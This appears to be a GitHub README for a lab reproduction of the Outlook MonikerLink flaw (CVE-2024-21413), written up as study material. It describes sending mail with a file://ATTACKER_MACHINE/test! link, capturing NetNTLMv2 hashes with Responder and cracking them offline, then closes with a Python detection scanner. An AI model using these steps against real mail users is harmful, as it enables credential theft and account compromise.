# 💻 CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability-PoC
This repository contains research notes and a high-level proof-of-concept (PoC) for CVE-2024-21413, a vulnerability observed in certain mail clients when handling SMB/moniker-style links embedded in messages. The PoC and experiments documented here were performed in a controlled lab environment on systems.
## 🧩 Overview
> This project reproduces the MonikerLink behavior (CVE-2024-21413) in a fully isolated TryHackMe environment to show how certain hyperlink formats can cause Outlook to process a link in a way that leaks authentication attempts or leads to further exploitation. The deliverable is a PoC and a prioritized set of mitigations and detection suggestions that security teams can apply. No live or unauthorized systems were targeted.
---
## ⚙️ Tools & Technologies
| Tool / Skill | Purpose |
|---------------|----------|
| 🐍 Python | Script development |
| 💻 Linux (Kali) | Target system |
| 🔐 Metasploit | Exploitation & access |
| 🧱 TryHackMe Lab | Controlled environment |
---
## 🚀 Setup & Execution
- Open a terminal on the Linux attacking machine.
- Create a Python file and paste in the code from [exploit.py](exploit.py).
>This code was written by CMNatic and can be found [here](https://github.com/CMNatic/CVE-2024-21413)
- I modified the code to fit my machine's environment.
>For example, in the line `<a href="file://ATTACKER_MACHINE/test!"` I replaced `ATTACKER_MACHINE` with the IP address of my attacking machine, and in the line `server = smtplib.SMTP('MAILSERVER', 25)` I replaced `MAILSERVER` with the IP address of my victim machine.
- Then I ran the exploit.py file and got the reply saying "the email has been sent".
- To catch the NetNTLMv2 response (a challenge-response hash that can be cracked offline with John the Ripper or similar tools to recover the plaintext password), I used a tool called Responder to capture the authentication attempt from the victim machine. The command to run Responder was
> responder -I ens5
- Here `-I` specifies the network interface; I used the ens5 interface. In my case the command showed an error, so to resolve it I first ran the following command, then retried the Responder command, and it worked
> systemctl start systemd-resolved
- Then I logged into my victim machine.
- I opened Outlook and clicked the link in the mail sent from the attacking machine.
- With a single click on the link, Responder on my attacking machine was able to capture the NetNTLMv2 hash.

---
This proof-of-concept exposes a nuance in Microsoft Outlook's link handling: certain file://-style moniker links that reference SMB resources may evade Outlook's standard filtering and provoke outbound authentication attempts. The behavior demonstrated here was reproduced in a fully controlled TryHackMe lab and highlights how seemingly benign link formats can mask network interactions. Although vendor patches and detection guidance have been issued, the underlying mechanics remain complex due to legitimate uses of the moniker/file scheme. Importantly, the activity generated by this PoC is observable at the network level (for example, in packet captures showing NTLM authentication attempts), making it amenable to forensic analysis and incident investigation.
## Detection
A YARA rule has been created by Florian Roth to detect emails containing the `file:\\` element.
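As an added example (not part of this repository or of Florian Roth's rule), a small Python scanner that applies the same idea to a raw `.eml` file: it flags `file://` hyperlinks that carry the `!` moniker suffix used in the PoC above, while leaving ordinary `file://` share links alone. The sample message, its addresses and the 203.0.113.5 host are constructed for the example.

```python
import re
from email import message_from_string

# file:// hyperlinks whose target ends in a '!' moniker suffix, the shape used
# by the PoC above (e.g. file://ATTACKER_MACHINE/test!). Plain file:// share
# links without the '!' do not match, so ordinary intranet links are not flagged.
MONIKER_HREF = re.compile(
    r'''href\s*=\s*["']?\s*file:(?://|\\\\)([^"'\s<>]+?)!''',
    re.IGNORECASE,
)


def find_moniker_links(html: str) -> list[str]:
    """Return the host/path part of every moniker-style file:// href in html."""
    return [m.group(1) for m in MONIKER_HREF.finditer(html)]


def scan_eml(raw: str) -> dict:
    """Parse a raw RFC 5322 message and report moniker links in its text parts."""
    msg = message_from_string(raw)
    targets = []
    for part in msg.walk():  # walks single-part and multipart messages alike
        if part.get_content_type() in ("text/html", "text/plain"):
            payload = part.get_payload(decode=True) or b""
            body = payload.decode(part.get_content_charset() or "utf-8", "replace")
            targets.extend(find_moniker_links(body))
    return {
        "from": msg.get("From", ""),
        "subject": msg.get("Subject", ""),
        "moniker_targets": targets,
        "suspicious": bool(targets),  # any hit warrants a closer look
    }


# Constructed sample message; 203.0.113.5 is a documentation (TEST-NET-3) address.
SAMPLE_EML = """\
From: sender@example.test
To: user@example.test
Subject: Invoice
Content-Type: text/html; charset=utf-8

<html><body>
<p>Please review: <a href="file://203.0.113.5/test!">invoice</a></p>
<p>Shared doc: <a href="file://fileserver.example.test/share/report.docx">report</a></p>
</body></html>
"""

if __name__ == "__main__":
    result = scan_eml(SAMPLE_EML)
    print(result)  # moniker_targets == ['203.0.113.5/test'], suspicious == True
```

Pair this content check with the network-level view described above: an outbound SMB/NTLM authentication attempt from a mail client shortly after a message with such a link is opened is the corroborating signal.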
